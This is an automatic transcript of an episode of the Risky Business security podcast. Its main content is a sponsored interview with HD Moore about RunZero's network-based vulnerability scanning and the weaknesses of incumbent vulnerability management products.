Can it be sold
to a foreign party? I don't even know what the data regulations on that are, you know?
Yeah, I mean, there was a one of the other companies that previously got sold got sold to the
Dutch. I don't know if there were originally a Dutch company or where it came from. But yeah,
like just deeply cyberpunk and, you know, past me wants to be here for the cyberpunk future because
I read a lot of books as a kid, as a teenager about what that future would look like, but
actually living it, I don't know that I'm that keen on it now.
Got to watch The Dutch, mate.
Got to watch The Dutch.
All right, we're going to wrap it up there.
Adam Boileau, thank you so much for joining me on the show.
To talk through all of that, always a pleasure and we'll do it all again next week.
Yeah, thanks Ross Pat.
I will talk to you then.
That was Adam Bailo with a run through of the week's security news.
Big thanks to him for that.
It is time for this week's sponsor interview now with HD Moore who is a founder, one of the founders of RunZero which is an asset
discovery platform. I guess you'd call it, you can throw it at an IP range and it
will find your devices, it does it in a very intelligent way, it can even find
stuff that you wouldn't expect it to because it's full of HD Moore tricks. You
can give it creds to your cloud environment and it can go and
scan from the inside of your cloud environment and find, you know, take an inventory basically
of everything that you're running.
Now one thing that HD has been working on and RunZero is pushing a new release which
does this is using RunZero as a vulnerability scanner basically.
And this kind of surprised me because vulnerability scanning, vulnerability management, it's such a mature market.
It's one of the oldest sort of product types in cyber security.
But as you're going to hear,
HD thinks that the majors have kind of atrophied a bit,
especially in that, you know,
especially when it comes to the capability of being able to point a scanner at
like an IP range or at an environment and getting it to bring back
information. He says it's all gone to like, you know, crowd strike, checking,
you know, file hashes on an endpoint to figure out versions of software or doing
authenticated scans or whatever, which is why nobody seems to know or find out
when they have a vulnerable Fortinet at the edge of their network, right?
So he's taken RunZero and given it a vulnerability scanning capability, which finds high impact
stuff that people really need to deal with pronto. So here is HD Moore talking about
that. Now what we're seeing is all the legacy solutions out there are either reporting irrelevant
vulnerabilities or not reporting the ones that are actually critical that'll get you
out. So we're taking all the same discovery information, asset information, inference we're doing on the
fingerprinting side and using that to identify what is the most likely route of compromise in
your organization and bubbling that to the top without just filtering someone else's list of,
you know, poorly chosen vulnerabilities. But I mean, isn't that what vuln scanners are supposed to do?
They're supposed to do that, but they haven't been doing it in a long time. I mean, the challenges are folks doing agent-based vuln scanning are missing the entire network
context, and folks who are doing authenticated-based vulnerability scanning are now missing all
the vulnerabilities and exposure on their IoT and unmanaged assets.
So either way, you're really not getting what you're paying for.
And if you look at what vulnerabilities are being used to exploit in companies and organizations
more often, half the time these things don't even have CVEs or they don't have a CVE till three weeks
afterwards. Yeah, right. So what? They're not even scanning for stuff unless it has a CVE or it's in
NIST or whatever. Yeah. There's some agent-based volume scanning right now. Only reports software
with CVEs. So by definition, you're not going to get coverage for that until it's probably too late.
I mean, this is the way though, like what you're describing RunZero does. I mean,
this is the way volume scanners used to work.
You would essentially give them an IP range and say, go.
And I understand that IP ranges these days are less useful because we've got so
much stuff in the cloud and so on and so on.
But that's what they used to do.
They used to go out there and actually find stuff, scan it, probe it, and
then figure out what vulnerable stuff was running.
You're telling me now that it's all authenticated scans
and endpoint stuff and no one's really doing that.
There's a tiny, tiny fraction of coverage
that's being pushed out by all the main vendors
that's unauthenticated to remote.
And it's such a small portion, it's
almost irrelevant to the number of checks overall.
Also keep in mind there's something like 260,000,
70,000 CVDs out there.
And even the best vulnerability scanners
only cover about half of that.
If you look at the ones that cover exploitable software,
they cover such a small portion of the exploitable,
of the exploit covered vulnerabilities.
It's also kind of a crime.
Like if you look at what's the coverage of Nexpo
versus Metasploit, for example,
there's still not a perfect overlap.
You still have vulnerabilities
that there's an exploit for Metasploit
where there's no coverage in any major vulnerability.
How are people finding bugs in their palos and their Fortinetts and stuff right now?
Like how's that process supposed to work when these scanners aren't really doing that job anymore?
That's a good question. I mean, what's happening now is you hear about it in the news and you hope
you get ahead of it before someone compromises your box. And then a week and a half later,
Palo Alto gives you a patch and you hope that over the weekend in between you weren't compromised
and you know, digging out Chinese IOCs. So it's kind of like the way the world right now we're seeing exploits moving so
fast but the time you hear about it's almost too late. So what we try to do at RunZero
is help you identify where that technology exists and get ahead of it as quick as you
can. So it's not a question of is my Palo Alto unpatched? Of course it is. The bug just
came out an hour ago. Where is your Palo Alto? Where is it exposed? Do you know where your
backup appliances are? What mitigating controls do you have in place?
You know, we were talking before we got recording and I mentioned that like in the early days
of Risky Business, sort of, you know, 2007 to 2010 timeframe, the way that I ran this
business is I would just have four sponsors every year, right?
And I would sell 25% of the sponsorships to like, you know, four companies.
And one of them was Tenable.
And this is when Tenable, I think when they first sponsored, they had like 20 people.
And, you know, they would provide, you know, great content and whatever.
And it was, yeah, all very wonderful.
And then at some point, I think what?
They listed and then the founders left.
And it just turned into a very different type of business, right?
It turned into a very sort of normal business, less of a, you know,
people who care about security style of business.
No offense to the, you know, I'm sure wonderful people who remain at Tenable,
but it seemed like the innovation kind of stopped there for a while. Do you think that,
you know, the atrophy in capabilities in volume scanning is, is sort of part of that mature
product category syndrome? Is that kind of how we got here? Do you think?
A little bit. I mean, if you were being asked to grow, you know, 10 to 30% per year, every
year after you've been around for 20 years, you need to go find another category. You
need to go find something else to expand your business into. You don't want to make what
you currently have better. What's happened though, instead, is we've taken the eye off
the ball for so long in global management that you have entire companies and even small
industries coming out that all they do is filter the crap you get for one vendor, give
you a smaller crap,
pile of crap to go address. And half the time they're starting off with the wrong set of vulnerabilities in the first place.
So, you know, example would be you've got to expose Mongo database on the network. No credentials.
Your vulnerability scanner doesn't report that. Your vulnerability scanner says, oh, I detected Mongo protocol, but that's it.
And so you're filtering through all your vulnerabilities. You're only looking at ones that are high and critical.
That never pops the top at all,
because it's not something that's even on the radar
as a higher critical CVE.
And now, you know, at the same time,
you now have your database over to the world
and no one's telling you about it.
So our model of kind of doing authenticated coverage
and software-based vulnerability coverage,
and then passing through as many filters as we can
to get the workload down has just resulted in us
doing all the wrong things
and missing the more important bones. So when you run these types of scans against your customer base, what sort of stuff is falling out?
And of that, what's the subset that people are being surprised by? You know, when they see it
actually come out, they're like, oh my God. Yeah, we do some crazy stuff. So we're trying not to
add like a million different bone checks and hit a,000 URLs in every web server in your network,
things like that.
A lot of what we're doing today is
taking the already amazing fingerprinting we have in run0
and then turning that into vulnerability inference.
So we can say, because you're running
this version of this thing, therefore, you've
got these vulnerabilities, and we can prove it
because of these things.
As opposed to have to go through and do a secondary check
to say, are you vulnerable to x, y, and z?
So we're able to go through and identify problems based on what
we know about the asset.
Like if it's an end-of-life asset,
we know that it's got a bunch of vulnerabilities
and there haven't been any patch to that asset
since the firmware was last released.
Some of the problems we find that are really interesting
we've chatted about before in the show,
which are like our inside-out tax service management.
We can identify the unique cryptographic fingerprint
of like an internal remote desktop server
and then scrape them to our internet
looking for anything that smells like it and say, Hey, this device internally
is actually exposed over here on a cellular link and you had no idea it was out there.
So we'll do some really neat things by combining the outside in data with the inside out scanning
data through unique correlation between those assets.
I mean, what's interesting here is like, you know, this is the modern twist on the old
school approach, right?
Where, you know, I'm thinking back like a million years ago when if you wanted to look
at a network, you know, first thing you'd do, you'd end map it, right? Where I, you know, I'm thinking back like a million years ago, when if you wanted to look at a network, you know, first thing you'd do, you'd end map
it right. You might throw nessus at an IP range or whatever. If you found any web servers,
you wouldn't even use nessus. Then you'd use something like a Nikto. Does Nikto exist anymore?
Probably not. Right? Surely not.
Nikto still does. It actually still finds things. A lot of commercial phone scanners
don't find.
That's amazing. Right? So yeah, you'd throw Nikto at a web server and whatever, and you'd,
you know, you'd sort of see what comes back.
Yeah, I'm just sort of surprised
that the whole thing's atrophied to the extent that it has.
And I'm guessing it's because vulnerable management
is such a huge compliance issue
that people just have to spend money on and tick the box.
And I guess that's where we are, right?
Arguably the market stopped rewarding innovation, right?
The more vulnerability is your product found, the less your customers liked you because
you made them look bad.
Like, if you're succeeding at building a great volume discovery platform, your customers
will have a worse score every time you put an update out because you're finding more
problems, right?
And customers hate that.
So I was in that kind of predicament early on in my career where we were doing vulnerability
checks specific to credit unions.
And every time we found new vulnerability in an online banking system, our customers would,
you know, raise bloody murder because we gave them all, you know, critical risk scores. We're like,
yes, go to Jack Henry, get your stuff fixed. But they didn't like the fact that it made them look
bad, even though it was accurate. Yeah. I remember once a friend of mine did a pen test on a
online banking platform and found a bug like the worst
type of bug that would allow you to log in as anyone transfer money around
whatever and then you know had had to give them the devastating news that it
was a carryover bug and it affected their live environment as it was that
day because this was they were testing the new platform before it was deployed
and the project matter was absolutely thrilled that it affected the existing platform because
it did not affect their go live for the new one.
So just an interesting story about incentives in security.
Now you gave us a bit of a rundown of the sort of stuff it finds and how it finds them.
But I'm guessing you've put this in beta for a little while now and some of your customers have used it. What are the things they're finding that have
surprised them? Because I imagine a lot of it, they're like, yeah, okay, we expected
to see that. But are there some categories that are popping up where they're just like,
oh my God, they didn't expect that? What are the unknown unknowns?
Now, the ones that I think have surprised people are like, when we look at an asset
and look at the vulnerabilities that are run zero, we're not just saying,
is this asset all by itself? We're looking at that asset in the context of all those neighbors and
friends and connectivity, everything else like that. So one thing we look for is like share
crypto keys. If you've got a machine using the same remote desktop TLS cert as another one in
the same network or the same SH host key or the same TLS cert and some other service, oftentimes
that points to the machine being cloned. And they're like, oh, I didn't realize we cloned
our golden machines, crypto key a thousand times
and deployed it everywhere.
Not only is that machine extremely visible,
but it's also across our internal system.
So you find these kinds of like weird unexpected trust
of things like shared crypto keys.
And that's been a fun one.
The other one we find a lot of are just
unauthenticated services, stuff just hanging out in the wind
like etcd, zookeeper, all these like DevOps tools
that are configuration databases are attached to all these like devops e-tools that are configuration databases
are attached to all these new school virtual appliances shipped by vendors exposed directly to the network and no one really scans them very well like the scanners don't cover them very well
no one's doing you know on-device scanning these things are better managed appliances
and they leak your crypto keys they'll leak your secrets leak your api keys all over the place
so between kind of the unexpected you know configuration databases and other sorts of like data stores being open to the world and vulnerabilities are
only identifiable because they're present. I'm more, I guess there's an attribute that
sheared across more than one host. Those two to be the biggest sources of surprises with
our new capabilities.
Now it's interesting too, that you were talking about like authenticated scans as being kind
of like the devil's work these days, right? And to a degree, I certainly agree with you.
But you're kind of doing the same thing,
but in cloud environments as well, right?
Like you are doing authenticated checks
into cloud environments.
Like how's your approach there different
to the incumbents, right?
Because I'm guessing that you're not just sitting there
trying to spin up scripts that check
files right?
Like it's a bit of a different process.
Yeah.
If you look at like traditional CSPMS, what they care about is like enumerating all your
stuff, trying to figure out what configuration problems you have saying you've got this problem.
We try to do it both ways.
You try to both grab all your data from your cloud back in your inventory, bring it all
together and then actually go scan it and say, what's actually reachable.
We don't have to trust that your security groups actually look like what we think they look like
We'll actually go try to send a pack and see if we get to it and that's kind of a big difference
It's like not just oh, it looks right
It's like it is a big difference because if you know if there's a misconfiguration that you're not checking for it will manifest itself
You when you actually go when the rubber hits the road you actually try to reach something and you can I mean well
Obviously something's wrong with the configuration. Yeah, we see wild stuff
I mean a really common problem
I see is companies will set up internal VPNs into
an AWS VPC from the corporate network and they'll screw up the apples completely.
And so you can have everybody in AWS now shelling into internal machines or vice
versa. Right. So it depends on how it's configured, but we find a lot of
misconfigurations of VPNs, especially from cloud to cloud and hyperscale.
Now look, one thing I wanted to get your thoughts on is I, you know, I even work
with a sponsor here, nuclear security, and I know that you plug into them as well, right?
And what they do is they take the output of vulnerability scanners and sort of normalize
them and whatever so that you can get a pretty sensible idea of what the vulnerabilities
in your environment actually look like.
But the issue is this is a company that would only, that only exists because
the amount of data that comes out of these things is overwhelming.
Like are you a bit concerned that people are going to be like, well, this is the last thing
I need is like more vulnerability information.
Like what have you done to sort of get around that?
Yeah, absolutely.
There's two things we do.
One is when we import data from, let's say like a Tenable or a Qualys or another platform,
we actually want to import the information level and the low level
vulnerabilities.
We don't necessarily get like the high and critical
those are great.
But what a lot of folks do is they just
ignore all the low and infos.
But that's actually where all the best information is.
If you're trying to figure out does this device run
this service, is this protocol running,
is this database installed, those
don't show up in critical vulnerabilities
unless there's something even further wrong with it.
We just want to know if they're there at all.
So we parse all the information level vulnerabilities
from those products to figure out whether there's something
useful we can tell the customer.
Second, when we report a vulnerability natively
in the product, we don't just put it all in one big
phone list, say, here you go.
Now we've actually done a new overlay on top
of what we call findings.
So we'll take a finding, which is,
you've got misconfigured databases,
or you've got internal management services
exposed to the internet.
We put them all into one big category,
put one big number on and say,
this is the thing to go fix,
as opposed to each individual sub-issue behind that.
So instead of getting a list of a thousand vulnerabilities
with varying severity, you get a list of like five or 10.
So you're trying to come up with a,
instead of starting off by just overwhelming the user
with a flood of vulnerability alerts,
we want to kind of like pre-filter at the down
into something that actually is relevant and matters to them
that is easy to action by, you know, per exposure.
Yeah, makes sense.
So final question, are you finding that people who are wanting to buy this and use it, I'm
guessing they're using it as an additional component of their volume management program,
right?
Like they're not throwing stuff out to get this,
like on the volume management side.
I know they are on the asset discovery side
and you've been having some real success there actually.
Taking market from some very large companies,
which is awesome.
I say that as an options holder in the company.
But in terms of like the volume scanning side,
I'm guessing that because there's not really much
in the market that does this at the moment,
it's just additive.
Yes and no.
So what we're finding right now is a lot of customers have chosen to buy volume management
from their EDR vendor.
So if you're a customer of an EDR vendor and you give them X dollars more per year per
endpoint, they'll say, here's a list of vulnerabilities.
But the vulnerabilities are only based on installed software.
They tell you nothing about the network exposure of that asset.
So oftentimes you have a company where all their windows endpoints are being covered by, let's say,
Tenable and CrowdStrike.
And now they're trying to figure out,
well, I'm doing authenticated scans with Tenable
and I've got a CrowdStrike agent, do I really need both?
And we're saying, well, you're probably getting
the same information for both at that point.
So let's say if you stopped paying Tenable
and instead you pay a lot less per asset to run zero,
we're gonna tell you what all the network exposure are
of all those assets and you'll still get
the software inventory-based vulnerability feed from CrowdStrike.
So we feel like there's a better together there in a lot of cases, either with us plus an EDR,
or in some cases us plus volume management. We also find cases where volume management has only
been deployed to half of the company, either because it's too expensive or because it crashes
half the stuff in the network. And those are also cases where if you're already rolling out some
kind of agent-based volume detection on where you can, you're not losing a lot by missing the unauthenticated scans, business products that fall in so far behind.
That's where RunZero can often do it cheaper, better, faster.
Yeah, awesome. Alright, HD Moore, always great to see you my friend, and yeah, we'll catch you in the next one.
Thanks again.
Thanks, Matt.
That was HD Moore from RunZero there, and you can find them at RunZero.com.
R-U-N-Z-E-R-O.com.
And yes, Americans, I said Zed, it's Zed.
But that is it for this week's show.
I do hope you enjoyed it.
I'll be back soon with more news and analysis for you all,
but until then, I've been Patrick Gray.
Thanks for listening.